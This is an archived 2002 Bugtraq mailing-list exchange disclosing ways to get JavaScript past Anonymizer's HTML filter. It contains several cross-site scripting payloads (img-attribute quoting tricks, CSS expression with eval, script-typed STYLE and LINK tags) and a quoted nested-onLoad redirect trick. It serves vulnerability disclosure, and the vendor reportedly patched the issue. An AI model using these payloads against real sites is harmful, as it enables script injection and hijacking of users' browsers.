[24941] in bugtraq
Re: Bypassing javascript filters - problem N3.
daemon@ATHENA.MIT.EDU (fozzy@dmpfrance.com)
Wed Apr 3 20:03:50 2002
In-Reply-To: <3327287312.20020401233749@leader.ru>
From: fozzy@dmpfrance.com
To: "Alexander K. Yezhov" <admin@leader.ru>
Cc: bugtraq@securityfocus.com, support@anonymizer.com, feedback@anonymizer.com
Date: Tue, 02 Apr 2002 15:48:23 GMT
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
Content-Transfer-Encoding: 8bit
Message-Id: <20020402154823.D668ADB77@mail.fr.clara.net>
Hello,
I took a quick look at it. This service seems to be vulnerable to several
known attacks against webmails.
I successfully injected unfiltered javascript into a web page browsed
through Anonymizer using:
* <img aaa="bbb>" src="javascript:alert('beep');">
(the original idea was published by Mark Slemko on vuln-dev, 23 Feb 2000...
but is still ignored on many webmails !)
* <P STYLE="left:expression(eval('alert(\'boop\')'))"> (thx to Guninski -
Bugtraq 1999)
* Some things that seems to work only with Netscape 4.x, like :
<STYLE TYPE="text/javascript">alert('biip');</style>
<STYLE TYPE="application/x-javascript">alert('burp');</style>
<LINK REL=STYLESHEET TYPE="text/javascript" SRC="http://.../script.js">
(thx to Jeremiah Grossman - WhiteHatSec Aug 2001)
...and probably more !...
I wish good luck to Anonymizer, because I what they are trying to do is
very close to "malicious html filtering" in webmails, and it seems to be
really difficult for webmails site to setup good filters. I wish Anonymizer
will show the way to a good web privacy.
FozZy
Hackademy - Paris.
Hackerz Voice International Edition
http://www.dmpfrance.com
Alexander K. Yezhov écrit:
> Hello bugtraq,
>
> Title: Bypassing JavaScript filters
> Service: Anonymizer, maybe similar services
>
> Description:
>
> Anonymizer offers free and commercial services that allow to browse
> web safely. Since JavaScript can be dangerous, all script blocks and
> events are cut from html.
>
> Problem N3:
>
> Maybe you remember the problem I've reported in 2001 - JavaScript
> code could be executed after parsing the html by Anonymizer. The
> same principle of "JavaScript inside JavaScript" gave me the working
> example of redirecting Anonymizer users recently.
>
> Demo is available as Test N3 at
> http://anon.free.anonymizer.com/http://tools-on.net/you.shtml
>
> The part of the code before parsing:
>
> onLoad="onLoad="document.cookie='rw=; expires=Thu, 01-Jan-1970
> onLoad="location='unprotected_location';"
>
> The same code after parsing:
>
> onLoad="location='unprotected_location';"
>
> Errors generated for visitors without Anonymizer are suppressed by
> window.onError handler.
>
> Problem status:
>
> Anonymizer has been contacted and patched already.
>
> Best regards, Alexander
>
> -----------------------------------------------------------------------
> MCP+I, MCSE on Windows NT 4, MCSE on Windows 2000
> http://leader.ru http://tools-on.net (Security & Privacy on the Net)
> -----------------------------------------------------------------------
>
